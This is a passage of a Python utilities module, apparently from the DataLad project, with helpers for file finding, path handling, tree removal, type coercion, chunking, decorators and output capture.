- keyword only (cannot be used positionally) arguments,\n 'any_kw` - any keyword (could be a positional which could be used as a keyword),\n `any` -- any type from the above.\n\n Returns\n -------\n tuple:\n Each element is a list of parameters (names only) of that \"kind\".\n \"\"\"\n selectors: list[set[int]] = []\n for kind in kinds:\n if kind not in _SIG_KIND_SELECTORS:\n raise ValueError(f\"Unknown 'kind' {kind}. Known are: {', '.join(_SIG_KIND_SELECTORS)}\")\n selectors.append(_SIG_KIND_SELECTORS[kind])\n\n out: list[list[str]] = [[] for _ in kinds]\n for p_name, p in inspect.signature(f).parameters.items():\n for i, selector in enumerate(selectors):\n if p.kind in selector:\n out[i].append(p_name)\n\n return tuple(out)\n\n\ndef any_re_search(regexes: str | list[str], value: str) -> bool:\n \"\"\"Return if any of regexes (list or str) searches successfully for value\"\"\"\n for regex in ensure_tuple_or_list(regexes):\n if re.search(regex, value):\n return True\n return False\n\n\ndef not_supported_on_windows(msg: Optional[str]=None) -> None:\n \"\"\"A little helper to be invoked to consistently fail whenever functionality is\n not supported (yet) on Windows\n \"\"\"\n if on_windows:\n raise NotImplementedError(\"This functionality is not yet implemented for Windows OS\"\n + (\": %s\" % msg if msg else \"\"))\n\n\ndef get_home_envvars(new_home: str | Path) -> dict[str, str]:\n \"\"\"Return dict with env variables to be adjusted for a new HOME\n\n Only variables found in current os.environ are adjusted.\n\n Parameters\n ----------\n new_home: str or Path\n New home path, in native to OS \"schema\"\n \"\"\"\n new_home = str(new_home)\n out = {'HOME': new_home}\n if on_windows:\n # requires special handling, since it has a number of relevant variables\n # and also Python changed its behavior and started to respect USERPROFILE only\n # since python 3.8: https://bugs.python.org/issue36264\n out['USERPROFILE'] = new_home\n out['HOMEDRIVE'], out['HOMEPATH'] = splitdrive(new_home)\n\n return {v: val for v, val in out.items() if v in os.environ}\n\n\ndef _is_stream_tty(stream: Optional[IO]) -> bool:\n try:\n # TODO: check on windows if hasattr check would work correctly and\n # add value:\n return stream is not None and stream.isatty()\n except ValueError as exc:\n # Who knows why it is a ValueError, but let's try to be specific\n # If there is a problem with I/O - non-interactive, otherwise reraise\n if \"I/O\" in str(exc):\n return False\n raise\n\n\ndef is_interactive() -> bool:\n \"\"\"Return True if all in/outs are open and tty.\n\n Note that in a somewhat abnormal case where e.g. stdin is explicitly\n closed, and any operation on it would raise a\n `ValueError(\"I/O operation on closed file\")` exception, this function\n would just return False, since the session cannot be used interactively.\n \"\"\"\n return all(_is_stream_tty(s) for s in (sys.stdin, sys.stdout, sys.stderr))\n\n\ndef get_ipython_shell() -> Optional[Any]:\n \"\"\"Detect if running within IPython and returns its `ip` (shell) object\n\n Returns None if not under ipython (no `get_ipython` function)\n \"\"\"\n try:\n return get_ipython() # type: ignore[name-defined]\n except NameError:\n return None\n\n\ndef md5sum(filename: str | Path) -> str:\n \"\"\"Compute an MD5 sum for the given file\n \"\"\"\n from datalad.support.digests import Digester\n return Digester(digests=['md5'])(filename)['md5']\n\n\n_encoded_dirsep = r'\\\\' if on_windows else r'/'\n_VCS_REGEX = r'%s\\.(?:git|gitattributes|svn|bzr|hg)(?:%s|$)' % (\n _encoded_dirsep, _encoded_dirsep)\n_DATALAD_REGEX = r'%s\\.(?:datalad)(?:%s|$)' % (\n _encoded_dirsep, _encoded_dirsep)\n\n\ndef find_files(regex: str, topdir: str | Path = curdir, exclude: Optional[str]=None, exclude_vcs: bool =True, exclude_datalad: bool =False, dirs: bool =False) -> Iterator[str]:\n \"\"\"Generator to find files matching regex\n\n Parameters\n ----------\n regex: string\n exclude: string, optional\n Matches to exclude\n exclude_vcs:\n If True, excludes commonly known VCS subdirectories. If string, used\n as regex to exclude those files (regex: `%r`)\n exclude_datalad:\n If True, excludes files known to be datalad meta-data files (e.g. under\n .datalad/ subdirectory) (regex: `%r`)\n topdir: string, optional\n Directory where to search\n dirs: bool, optional\n Whether to match directories as well as files\n \"\"\"\n for dirpath, dirnames, filenames in os.walk(topdir):\n names = (dirnames + filenames) if dirs else filenames\n # TODO: might want to uniformize on windows to use '/'\n paths = (op.join(dirpath, name) for name in names)\n for path in filter(re.compile(regex).search, paths):\n path = path.rstrip(sep)\n if exclude and re.search(exclude, path):\n continue\n if exclude_vcs and re.search(_VCS_REGEX, path):\n continue\n if exclude_datalad and re.search(_DATALAD_REGEX, path):\n continue\n yield path\nfind_files.__doc__ %= (_VCS_REGEX, _DATALAD_REGEX) # type: ignore[operator]\n\n\ndef expandpath(path: str | Path, force_absolute: bool =True) -> str:\n \"\"\"Expand all variables and user handles in a path.\n\n By default return an absolute path\n \"\"\"\n path = expandvars(expanduser(path))\n if force_absolute:\n path = abspath(path)\n return path\n\n\ndef posix_relpath(path: str | Path, start: Optional[str | Path]=None) -> str:\n \"\"\"Behave like os.path.relpath, but always return POSIX paths...\n\n on any platform.\"\"\"\n # join POSIX style\n return posixpath.join(\n # split and relpath native style\n # python2.7 ntpath implementation of relpath cannot handle start=None\n *split(\n relpath(path, start=start if start is not None else '')))\n\n\ndef is_explicit_path(path: str | Path) -> bool:\n \"\"\"Return whether a path explicitly points to a location\n\n Any absolute path, or relative path starting with either '../' or\n './' is assumed to indicate a location on the filesystem. Any other\n path format is not considered explicit.\"\"\"\n path = expandpath(path, force_absolute=False)\n return isabs(path) \\\n or path.startswith(os.curdir + os.sep) \\\n or path.startswith(os.pardir + os.sep)\n\n\ndef rotree(path: str | Path, ro: bool =True, chmod_files: bool =True) -> None:\n \"\"\"To make tree read-only or writable\n\n Parameters\n ----------\n path : string\n Path to the tree/directory to chmod\n ro : bool, optional\n Whether to make it R/O (default) or RW\n chmod_files : bool, optional\n Whether to operate also on files (not just directories)\n \"\"\"\n if ro:\n chmod = lambda f: os.chmod(f, os.stat(f).st_mode & ~stat.S_IWRITE)\n else:\n chmod = lambda f: os.chmod(f, os.stat(f).st_mode | stat.S_IWRITE | stat.S_IREAD)\n\n for root, dirs, files in os.walk(path, followlinks=False):\n if chmod_files:\n for f in files:\n fullf = op.join(root, f)\n # might be the \"broken\" symlink which would fail to stat etc\n if exists(fullf):\n chmod(fullf)\n chmod(root)\n\n\ndef rmtree(path: str | Path, chmod_files: bool | Literal[\"auto\"] ='auto', children_only: bool =False, *args: Any, **kwargs: Any) -> None:\n \"\"\"To remove git-annex .git it is needed to make all files and directories writable again first\n\n Parameters\n ----------\n path: Path or str\n Path to remove\n chmod_files : string or bool, optional\n Whether to make files writable also before removal. Usually it is just\n a matter of directories to have write permissions.\n If 'auto' it would chmod files on windows by default\n children_only : bool, optional\n If set, all files and subdirectories would be removed while the path\n itself (must be a directory) would be preserved\n `*args` :\n `**kwargs` :\n Passed into shutil.rmtree call\n \"\"\"\n # Give W permissions back only to directories, no need to bother with files\n if chmod_files == 'auto':\n chmod_files = on_windows\n # TODO: yoh thinks that if we could quickly check our Flyweight for\n # repos if any of them is under the path, and could call .precommit\n # on those to possibly stop batched processes etc, we did not have\n # to do it on case by case\n # Check for open files\n assert_no_open_files(path)\n\n # TODO the whole thing should be reimplemented with pathlib, but for now\n # at least accept Path\n path = str(path)\n\n if children_only:\n if not isdir(path):\n raise ValueError(\"Can remove children only of directories\")\n for p in os.listdir(path):\n rmtree(op.join(path, p))\n return\n if not (islink(path) or not isdir(path)):\n rotree(path, ro=False, chmod_files=chmod_files)\n if on_windows:\n # shutil fails to remove paths that exceed 260 characters on Windows machines\n # that did not enable long path support. A workaround to remove long paths\n # anyway is to prepend \\\\?\\ to the path.\n # https://docs.microsoft.com/en-us/windows/win32/fileio/naming-a-file?redirectedfrom=MSDN#win32-file-namespaces\n path = r'\\\\?\\ '.strip() + path\n _rmtree(path, *args, **kwargs)\n else:\n # just remove the symlink\n unlink(path)\n\n\ndef rmdir(path: str | Path, *args: Any, **kwargs: Any) -> None:\n \"\"\"os.rmdir with our optional checking for open files\"\"\"\n assert_no_open_files(path)\n os.rmdir(path)\n\n\ndef get_open_files(path: str | Path, log_open: int = False) -> dict[str, Any]:\n \"\"\"Get open files under a path\n\n Note: This function is very slow on Windows.\n\n Parameters\n ----------\n path : str\n File or directory to check for open files under\n log_open : bool or int\n If set - logger level to use\n\n Returns\n -------\n dict\n path : pid\n\n \"\"\"\n # Original idea: https://stackoverflow.com/a/11115521/1265472\n import psutil\n files = {}\n # since the ones returned by psutil would not be aware of symlinks in the\n # path we should also get realpath for path\n # do absolute() in addition to always get an absolute path\n # even with non-existing paths on windows\n path = str(Path(path).resolve().absolute())\n for proc in psutil.process_iter():\n try:\n open_paths = [p.path for p in proc.open_files()] + [proc.cwd()]\n for p in open_paths:\n # note: could be done more efficiently so we do not\n # renormalize path over and over again etc\n if path_startswith(p, path):\n files[p] = proc\n # Catch a race condition where a process ends\n # before we can examine its files\n except psutil.NoSuchProcess:\n pass\n except psutil.AccessDenied:\n pass\n\n if files and log_open:\n lgr.log(log_open, \"Open files under %s: %s\", path, files)\n return files\n\n\n_assert_no_open_files_cfg = os.environ.get('DATALAD_ASSERT_NO_OPEN_FILES')\nif _assert_no_open_files_cfg:\n def assert_no_open_files(path: str | Path) -> None:\n files = get_open_files(path, log_open=40)\n if _assert_no_open_files_cfg == 'assert':\n assert not files, \"Got following files still open: %s\" % ','.join(files)\n elif files:\n if _assert_no_open_files_cfg == 'pdb':\n import pdb\n pdb.set_trace()\n elif _assert_no_open_files_cfg == 'epdb':\n import epdb # type: ignore[import]\n epdb.serve()\n pass\n # otherwise we would just issue that error message in the log\nelse:\n def assert_no_open_files(path: str | Path) -> None:\n pass\n\n\ndef rmtemp(f: str | Path, *args: Any, **kwargs: Any) -> None:\n \"\"\"Wrapper to centralize removing of temp files so we could keep them around\n\n It will not remove the temporary file/directory if DATALAD_TESTS_TEMP_KEEP\n environment variable is defined\n \"\"\"\n if not os.environ.get('DATALAD_TESTS_TEMP_KEEP'):\n if not os.path.lexists(f):\n lgr.debug(\"Path %s does not exist, so can't be removed\", f)\n return\n lgr.log(5, \"Removing temp file: %s\", f)\n # Can also be a directory\n if isdir(f):\n rmtree(f, *args, **kwargs)\n else:\n unlink(f)\n else:\n lgr.info(\"Keeping temp file: %s\", f)\n\n\n@overload\ndef file_basename(name: str | Path, return_ext: Literal[True]) -> tuple[str, str]:\n ...\n\n@overload\ndef file_basename(name: str | Path, return_ext: Literal[False] = False) -> str:\n ...\n\ndef file_basename(name: str | Path, return_ext: bool =False) -> str | tuple[str, str]:\n \"\"\"\n Strips up to 2 extensions of length up to 4 characters and starting with alpha\n not a digit, so we could get rid of .tar.gz etc\n \"\"\"\n bname = basename(name)\n fbname = re.sub(r'(\\.[a-zA-Z_]\\S{1,4}){0,2}$', '', bname)\n if return_ext:\n return fbname, bname[len(fbname) + 1:]\n else:\n return fbname\n\n\n# unused in -core\ndef escape_filename(filename: str) -> str:\n \"\"\"Surround filename in \"\" and escape \" in the filename\n \"\"\"\n filename = filename.replace('\"', r'\\\"').replace('`', r'\\`')\n filename = '\"%s\"' % filename\n return filename\n\n\n# unused in -core\ndef encode_filename(filename: str | bytes) -> bytes:\n \"\"\"Encode unicode filename\n \"\"\"\n if isinstance(filename, str):\n return filename.encode(sys.getfilesystemencoding())\n else:\n return filename\n\n\n# unused in -core\ndef decode_input(s: str | bytes) -> str:\n \"\"\"Given input string/bytes, decode according to stdin codepage (or UTF-8)\n if not defined\n\n If fails -- issue warning and decode allowing for errors\n being replaced\n \"\"\"\n if isinstance(s, str):\n return s\n else:\n encoding = sys.stdin.encoding or 'UTF-8'\n try:\n return s.decode(encoding)\n except UnicodeDecodeError as exc:\n lgr.warning(\n \"Failed to decode input string using %s encoding. \"\n \"Decoding allowing for errors\", encoding)\n return s.decode(encoding, errors='replace')\n\n\n# unused in -core\nif on_windows:\n def lmtime(filepath: str | Path, mtime: int | float) -> None:\n \"\"\"Set mtime for files. On Windows a merely adapter to os.utime\n \"\"\"\n os.utime(filepath, (time.time(), mtime))\nelse:\n def lmtime(filepath: str | Path, mtime: int | float) -> None:\n \"\"\"Set mtime for files, while not de-referencing symlinks.\n\n To overcome absence of os.lutime\n\n Works only on linux and OSX ATM\n \"\"\"\n from .cmd import WitlessRunner\n\n # convert mtime to format touch understands [[CC]YY]MMDDhhmm[.SS]\n smtime = time.strftime(\"%Y%m%d%H%M.%S\", time.localtime(mtime))\n lgr.log(3, \"Setting mtime for %s to %s == %s\", filepath, mtime, smtime)\n WitlessRunner().run(['touch', '-h', '-t', '%s' % smtime, str(filepath)])\n filepath = Path(filepath)\n rfilepath = filepath.resolve()\n if filepath.is_symlink() and rfilepath.exists():\n # trust no one - adjust also of the target file\n # since it seemed like downloading under OSX (was it using curl?)\n # didn't bother with timestamps\n lgr.log(3, \"File is a symlink to %s Setting mtime for it to %s\",\n rfilepath, mtime)\n os.utime(str(rfilepath), (time.time(), mtime))\n # doesn't work on OSX\n # Runner().run(['touch', '-h', '-d', '@%s' % mtime, filepath])\n\n\n# See <https://github.com/python/typing/discussions/1366> for a request for a\n# better way to annotate this function.\ndef ensure_tuple_or_list(obj: Any) -> list | tuple:\n \"\"\"Given an object, wrap into a tuple if not list or tuple\n \"\"\"\n if isinstance(obj, (list, tuple)):\n return tuple(obj)\n return (obj,)\n\n\nListOrSet = TypeVar(\"ListOrSet\", list, set)\n\n\n# TODO: Improve annotation:\ndef ensure_iter(s: Any, cls: type[ListOrSet], copy: bool=False, iterate: bool=True) -> ListOrSet:\n \"\"\"Given not a list, would place it into a list. If None - empty list is returned\n\n Parameters\n ----------\n s: list or anything\n cls: class\n Which iterable class to ensure\n copy: bool, optional\n If correct iterable is passed, it would generate its shallow copy\n iterate: bool, optional\n If it is not a list, but something iterable (but not a str)\n iterate over it.\n \"\"\"\n\n if isinstance(s, cls):\n return s if not copy else shallow_copy(s)\n elif isinstance(s, str):\n return cls((s,))\n elif iterate and hasattr(s, '__iter__'):\n return cls(s)\n elif s is None:\n return cls()\n else:\n return cls((s,))\n\n\n# TODO: Improve annotation:\ndef ensure_list(s: Any, copy: bool=False, iterate: bool=True) -> list:\n \"\"\"Given not a list, would place it into a list. If None - empty list is returned\n\n Parameters\n ----------\n s: list or anything\n copy: bool, optional\n If list is passed, it would generate a shallow copy of the list\n iterate: bool, optional\n If it is not a list, but something iterable (but not a str)\n iterate over it.\n \"\"\"\n return ensure_iter(s, list, copy=copy, iterate=iterate)\n\n\n# TODO: Improve annotation:\ndef ensure_result_list(r: Any) -> list:\n \"\"\"Return a list of result records\n\n Largely same as ensure_list, but special casing a single dict being passed\n in, which a plain `ensure_list` would iterate over. Hence, this deals with\n the three ways datalad commands return results:\n - single dict\n - list of dicts\n - generator\n\n Used for result assertion helpers.\n \"\"\"\n return [r] if isinstance(r, dict) else ensure_list(r)\n\n@overload\ndef ensure_list_from_str(s: str, sep: str='\\n') -> Optional[list[str]]:\n ...\n\n@overload\ndef ensure_list_from_str(s: list[T], sep: str='\\n') -> Optional[list[T]]:\n ...\n\ndef ensure_list_from_str(s: str | list[T], sep: str='\\n') -> Optional[list[str]] | Optional[list[T]]:\n \"\"\"Given a multiline string convert it to a list of return None if empty\n\n Parameters\n ----------\n s: str or list\n \"\"\"\n\n if not s:\n return None\n\n if isinstance(s, list):\n return s\n return s.split(sep)\n\n@overload\ndef ensure_dict_from_str(s: str, sep: str = '\\n') -> Optional[dict[str, str]]:\n ...\n\n@overload\ndef ensure_dict_from_str(s: dict[K, V], sep: str = '\\n') -> Optional[dict[K, V]]:\n ...\n\ndef ensure_dict_from_str(s: str | dict[K, V], sep: str = '\\n') -> Optional[dict[str, str]] | Optional[dict[K, V]]:\n \"\"\"Given a multiline string with key=value items convert it to a dictionary\n\n Parameters\n ----------\n s: str or dict\n\n Returns None if input s is empty\n \"\"\"\n\n if not s:\n return None\n\n if isinstance(s, dict):\n return s\n\n out: dict[str, str] = {}\n values = ensure_list_from_str(s, sep=sep)\n assert values is not None\n for value_str in values:\n if '=' not in value_str:\n raise ValueError(\"{} is not in key=value format\".format(repr(value_str)))\n k, v = value_str.split('=', 1)\n if k in out:\n err = \"key {} was already defined in {}, but new value {} was provided\".format(k, out, v)\n raise ValueError(err)\n out[k] = v\n return out\n\n\ndef ensure_bytes(s: str | bytes, encoding: str='utf-8') -> bytes:\n \"\"\"Convert/encode unicode string to bytes.\n\n If `s` isn't a string, return it as is.\n\n Parameters\n ----------\n encoding: str, optional\n Encoding to use. \"utf-8\" is the default\n \"\"\"\n if not isinstance(s, str):\n return s\n return s.encode(encoding)\n\n\ndef ensure_unicode(s: str | bytes, encoding: Optional[str]=None, confidence: Optional[float]=None) -> str:\n \"\"\"Convert/decode bytestring to unicode.\n\n If `s` isn't a bytestring, return it as is.\n\n Parameters\n ----------\n encoding: str, optional\n Encoding to use. If None, \"utf-8\" is tried, and then if not a valid\n UTF-8, encoding will be guessed\n confidence: float, optional\n A value between 0 and 1, so if guessing of encoding is of lower than\n specified confidence, ValueError is raised\n \"\"\"\n if not isinstance(s, bytes):\n return s\n if encoding is None:\n # Figure out encoding, defaulting to 'utf-8' which is our common\n # target in contemporary digital society\n try:\n return s.decode('utf-8')\n except UnicodeDecodeError as exc:\n lgr.debug(\"Failed to decode a string as utf-8: %s\",\n CapturedException(exc))\n # And now we could try to guess\n from chardet import detect\n enc = detect(s)\n denc = enc.get('encoding', None)\n if denc:\n denc_confidence = enc.get('confidence', 0)\n if confidence is not None and denc_confidence < confidence:\n raise ValueError(\n \"Failed to auto-detect encoding with high enough \"\n \"confidence. Highest confidence was %s for %s\"\n % (denc_confidence, denc)\n )\n lgr.log(5, \"Auto-detected encoding to be %s\", denc)\n return s.decode(denc)\n else:\n raise ValueError(\n \"Could not decode value as utf-8, or to guess its encoding: %s\"\n % repr(s)\n )\n else:\n return s.decode(encoding)\n\n\ndef ensure_bool(s: Any) -> bool:\n \"\"\"Convert value into boolean following convention for strings\n\n to recognize on,True,yes as True, off,False,no as False\n \"\"\"\n if isinstance(s, str):\n if s.isdigit():\n return bool(int(s))\n sl = s.lower()\n if sl in {'y', 'yes', 'true', 'on'}:\n return True\n elif sl in {'n', 'no', 'false', 'off'}:\n return False\n else:\n raise ValueError(\"Do not know how to treat %r as a boolean\" % s)\n return bool(s)\n\n\ndef unique(seq: Sequence[T], key: Optional[Callable[[T], Any]]=None, reverse: bool=False) -> list[T]:\n \"\"\"Given a sequence return a list only with unique elements while maintaining order\n\n This is the fastest solution. See\n https://www.peterbe.com/plog/uniqifiers-benchmark\n and\n http://stackoverflow.com/a/480227/1265472\n for more information.\n Enhancement -- added ability to compare for uniqueness using a key function\n\n Parameters\n ----------\n seq:\n Sequence to analyze\n key: callable, optional\n Function to call on each element so we could decide not on a full\n element, but on its member etc\n reverse: bool, optional\n If True, uniqueness checked in the reverse order, so that the later ones\n will take the order\n \"\"\"\n seen: set[T] = set()\n seen_add = seen.add\n\n if reverse:\n def trans(x: Sequence[T]) -> Iterable[T]:\n return reversed(x)\n else:\n def trans(x: Sequence[T]) -> Iterable[T]:\n return x\n\n if key is None:\n out = [x for x in trans(seq) if not (x in seen or seen_add(x))]\n else:\n # OPT: could be optimized, since key is called twice, but for our cases\n # should be just as fine\n out = [x for x in trans(seq) if not (key(x) in seen or seen_add(key(x)))]\n\n return out[::-1] if reverse else out\n\n\n# TODO: Annotate (would be made easier if the return value was always a dict\n# instead of doing `v.__class__(...)`)\ndef map_items(func, v):\n \"\"\"A helper to apply `func` to all elements (keys and values) within dict\n\n No type checking of values passed to func is done, so `func`\n should be resilient to values which it should not handle\n\n Initial usecase - apply_recursive(url_fragment, ensure_unicode)\n \"\"\"\n # map all elements within item\n return v.__class__(\n item.__class__(map(func, item))\n for item in v.items()\n )\n\n\ndef partition(items: Iterable[T], predicate: Callable[[T], Any]=bool) -> tuple[Iterator[T], Iterator[T]]:\n \"\"\"Partition `items` by `predicate`.\n\n Parameters\n ----------\n items : iterable\n predicate : callable\n A function that will be mapped over each element in `items`. The\n elements will partitioned based on whether the return value is false or\n true.\n\n Returns\n -------\n A tuple with two generators, the first for 'false' items and the second for\n 'true' ones.\n\n Notes\n -----\n Taken from Peter Otten's snippet posted at\n https://nedbatchelder.com/blog/201306/filter_a_list_into_two_parts.html\n \"\"\"\n a, b = tee((predicate(item), item) for item in items)\n return ((item for pred, item in a if not pred),\n (item for pred, item in b if pred))\n\n\ndef generate_chunks(container: list[T], size: int) -> Iterator[list[T]]:\n \"\"\"Given a container, generate chunks from it with size up to `size`\n \"\"\"\n # There could be a \"smarter\" solution but I think this would suffice\n assert size > 0, \"Size should be non-0 positive\"\n while container:\n yield container[:size]\n container = container[size:]\n\n\ndef generate_file_chunks(files: list[str], cmd: str | list[str] | None = None) -> Iterator[list[str]]:\n \"\"\"Given a list of files, generate chunks of them to avoid exceeding cmdline length\n\n Parameters\n ----------\n files: list of str\n cmd: str or list of str, optional\n Command to account for as well\n \"\"\"\n files = ensure_list(files)\n cmd = ensure_list(cmd)\n\n maxl = max(map(len, files)) if files else 0\n chunk_size = max(\n 1, # should at least be 1. If blows then - not our fault\n (CMD_MAX_ARG\n - sum((len(x) + 3) for x in cmd)\n - 4 # for '--' below\n ) // (maxl + 3) # +3 for possible quotes and a space\n )\n # TODO: additional treatment for \"too many arguments\"? although\n # as https://github.com/datalad/datalad/issues/1883#issuecomment\n # -436272758\n # shows there seems to be no hardcoded limit on # of arguments,\n # but may be we decide to go for smth like follow to be on safe side\n # chunk_size = min(10240 - len(cmd), chunk_size)\n file_chunks = generate_chunks(files, chunk_size)\n return file_chunks\n\n\n#\n# Generators helpers\n#\n\ndef saved_generator(gen: Iterable[T]) -> tuple[Iterator[T], Iterator[T]]:\n \"\"\"Given a generator returns two generators, where 2nd one just replays\n\n So the first one would be going through the generated items and 2nd one\n would be yielding saved items\n \"\"\"\n saved = []\n\n def gen1() -> Iterator[T]:\n for x in gen: # iterating over original generator\n saved.append(x)\n yield x\n\n def gen2() -> Iterator[T]:\n for x in saved: # yielding saved entries\n yield x\n\n return gen1(), gen2()\n\n\n#\n# Decorators\n#\n\n# Originally better_wraps was created to provide `wrapt`-based, instead of\n# `functools.wraps` implementation to preserve the correct signature of the\n# decorated function. By using inspect.signature in our getargspec, which\n# works fine on `functools.wraps`ed functions, we mediated this necessity.\nbetter_wraps = wraps\n\n\n# TODO: Annotate:\n# Borrowed from pandas\n# Copyright: 2011-2014, Lambda Foundry, Inc. and PyData Development Team\n# License: BSD-3\ndef optional_args(decorator):\n \"\"\"allows a decorator to take optional positional and keyword arguments.\n Assumes that taking a single, callable, positional argument means that\n it is decorating a function, i.e. something like this::\n\n @my_decorator\n def function(): pass\n\n Calls decorator with decorator(f, `*args`, `**kwargs`)\"\"\"\n\n @better_wraps(decorator)\n def wrapper(*args, **kwargs):\n def dec(f):\n return decorator(f, *args, **kwargs)\n\n is_decorating = not kwargs and len(args) == 1 and isinstance(args[0], Callable)\n if is_decorating:\n f = args[0]\n args = []\n return dec(f)\n else:\n return dec\n\n return wrapper\n\n\n# TODO: just provide decorators for tempfile.mk* functions. This is ugly!\ndef get_tempfile_kwargs(tkwargs: Optional[dict[str, Any]]=None, prefix: str=\"\", wrapped: Optional[Callable]=None) -> dict[str, Any]:\n \"\"\"Updates kwargs to be passed to tempfile. calls depending on env vars\n \"\"\"\n if tkwargs is None:\n tkwargs_ = {}\n else:\n # operate on a copy of tkwargs to avoid any side-effects\n tkwargs_ = tkwargs.copy()\n\n # TODO: don't remember why I had this one originally\n # if len(targs)<2 and \\\n if 'prefix' not in tkwargs_:\n tkwargs_['prefix'] = '_'.join(\n ['datalad_temp'] +\n ([prefix] if prefix else []) +\n ([''] if (on_windows or not wrapped) else [wrapped.__name__]))\n\n directory = os.environ.get('TMPDIR')\n if directory and 'dir' not in tkwargs_:\n tkwargs_['dir'] = directory\n\n return tkwargs_\n\n\ndef line_profile(func: Callable[P, T]) -> Callable[P, T]:\n \"\"\"Q&D helper to line profile the function and spit out stats\n \"\"\"\n import line_profiler # type: ignore[import]\n prof = line_profiler.LineProfiler()\n\n @wraps(func)\n def _wrap_line_profile(*args: P.args, **kwargs: P.kwargs) -> T:\n try:\n pfunc = prof(func)\n return pfunc(*args, **kwargs)\n finally:\n prof.print_stats()\n return _wrap_line_profile\n\n\n# unused in -core\n@optional_args\ndef collect_method_callstats(func: Callable[P, T]) -> Callable[P, T]:\n \"\"\"Figure out methods which call the method repeatedly on the same instance\n\n Use case(s):\n - .repo is expensive since does all kinds of checks.\n - .config is expensive transitively since it calls .repo each time\n\n TODO:\n - fancy one could look through the stack for the same id(self) to see if\n that location is already in memo. That would hint to the cases where object\n is not passed into underlying functions, causing them to redo the same work\n over and over again\n - ATM might flood with all \"1 lines\" calls which are not that informative.\n The underlying possibly suboptimal use might be coming from their callers.\n It might or not relate to the previous TODO\n \"\"\"\n import traceback\n from collections import defaultdict\n from time import time\n memo: defaultdict[tuple[int, str], defaultdict[int, int]] = defaultdict(lambda: defaultdict(int)) # it will be a dict of lineno: count\n # gross timing\n times = []\n toppath = dirname(__file__) + sep\n\n @wraps(func)\n def _wrap_collect_method_callstats(*args: P.args, **kwargs: P.kwargs) -> T:\n try:\n self = args[0]\n stack = traceback.extract_stack()\n caller = stack[-2]\n stack_sig = \\\n \"{relpath}:{s.name}\".format(\n s=caller, relpath=relpath(caller.filename, toppath))\n sig = (id(self), stack_sig)\n # we will count based on id(self) + wherefrom\n if caller.lineno is not None:\n memo[sig][caller.lineno] += 1\n t0 = time()\n return func(*args, **kwargs)\n finally:\n times.append(time() - t0)\n pass\n\n def print_stats() -> None:\n print(\"The cost of property {}:\".format(func.__name__))\n if not memo:\n print(\"None since no calls\")\n return\n # total count\n counts = {k: sum(v.values()) for k,v in memo.items()}\n total = sum(counts.values())\n ids = {self_id for (self_id, _) in memo}\n print(\" Total: {} calls from {} objects with {} contexts taking {:.2f} sec\"\n .format(total, len(ids), len(memo), sum(times)))\n # now we need to sort by value\n for (self_id, caller), count in sorted(counts.items(), key=lambda x: x[1], reverse=True):\n print(\" {} {}: {} from {} lines\"\n .format(self_id, caller, count, len(memo[(self_id, caller)])))\n\n # Upon total exit we print the stats\n import atexit\n atexit.register(print_stats)\n\n return _wrap_collect_method_callstats\n\n\n# Borrowed from duecredit to wrap duecredit-handling to guarantee failsafe\ndef never_fail(f: Callable[P, T]) -> Callable[P, Optional[T]]:\n \"\"\"Assure that function never fails -- all exceptions are caught\n\n Returns `None` if function fails internally.\n \"\"\"\n @wraps(f)\n def wrapped_func(*args: P.args, **kwargs: P.kwargs) -> Optional[T]:\n try:\n return f(*args, **kwargs)\n except Exception as e:\n lgr.warning(\n \"DataLad internal failure while running %s: %r. \"\n \"Please report at https://github.com/datalad/datalad/issues\"\n % (f, e)\n )\n return None\n\n if os.environ.get('DATALAD_ALLOW_FAIL', False):\n return f\n else:\n return wrapped_func\n\n\ndef shortened_repr(value: Any, l: int=30) -> str:\n try:\n if hasattr(value, '__repr__') and (value.__repr__ is not object.__repr__):\n value_repr = repr(value)\n if not value_repr.startswith('<') and len(value_repr) > l:\n value_repr = \"<<%s++%d chars++%s>>\" % (\n value_repr[:l - 16],\n len(value_repr) - (l - 16 + 4),\n value_repr[-4:]\n )\n elif value_repr.startswith('<') and value_repr.endswith('>') and ' object at 0x':\n raise ValueError(\"I hate those useless long reprs\")\n else:\n raise ValueError(\"gimme class\")\n except Exception as e:\n value_repr = \"<%s>\" % value.__class__.__name__.split('.')[-1]\n return value_repr\n\n\ndef __auto_repr__(obj: Any, short: bool =True) -> str:\n attr_names: tuple[str, ...] = tuple()\n if hasattr(obj, '__dict__'):\n attr_names += tuple(obj.__dict__.keys())\n if hasattr(obj, '__slots__'):\n attr_names += tuple(obj.__slots__)\n\n items = []\n for attr in sorted(set(attr_names)):\n if attr.startswith('_'):\n continue\n value = getattr(obj, attr)\n # TODO: should we add this feature to minimize some talktative reprs\n # such as of URL?\n #if value is None:\n # continue\n items.append(\"%s=%s\" % (attr, shortened_repr(value) if short else value))\n\n return \"%s(%s)\" % (obj.__class__.__name__, ', '.join(items))\n\n\n@optional_args\ndef auto_repr(cls: type[T], short: bool=True) -> type[T]:\n \"\"\"Decorator for a class to assign it an automagic quick and dirty __repr__\n\n It uses public class attributes to prepare repr of a class\n\n Original idea: http://stackoverflow.com/a/27799004/1265472\n \"\"\"\n\n cls.__repr__ = lambda obj:__auto_repr__(obj, short=short) # type: ignore[assignment]\n return cls\n\n\ndef todo_interface_for_extensions(f: T) -> T:\n return f\n\n\n#\n# Context Managers\n#\n\n\n# unused in -core\n@contextmanager\ndef nothing_cm() -> Iterator[None]:\n \"\"\"Just a dummy cm to programmically switch context managers\"\"\"\n yield\n\n\nclass SwallowOutputsAdapter:\n \"\"\"Little adapter to help getting out/err values\n \"\"\"\n def __init__(self) -> None:\n kw = get_tempfile_kwargs({}, prefix=\"outputs\")\n\n self._out = NamedTemporaryFile(delete=False, mode='w', **kw)\n self._err = NamedTemporaryFile(delete=False, mode='w', **kw)\n\n def _read(self, h: IO[str]) -> str:\n with open(h.name) as f:\n return f.read()\n\n @property\n def out(self) -> str:\n if not self._out.closed:\n self._out.flush()\n return self._read(self._out)\n\n @property\n def err(self) -> str:\n if not self._err.closed:\n self._err.flush()\n return self._read(self._err)\n\n @property\n def handles(self) -> tuple[TextIO, TextIO]:\n return (cast(TextIO, self._out), cast(TextIO, self._err))\n\n def cleanup(self) -> None:\n self._out.close()\n self._err.close()\n out_name = self._out.name\n err_name = self._err.name\n from datalad import cfg\n if cfg.getbool('datalad.log', 'outputs', default=False) \\\n and lgr.getEffectiveLevel() <= logging.DEBUG:\n for s, sname in ((self.out, 'stdout'),\n (self.err, 'stderr')):\n if s:\n pref = os.linesep + \"| \"\n lgr.debug(\"Swallowed %s:%s%s\", sname, pref, s.replace(os.linesep, pref))\n else:\n lgr.debug(\"Nothing was swallowed for %s\", 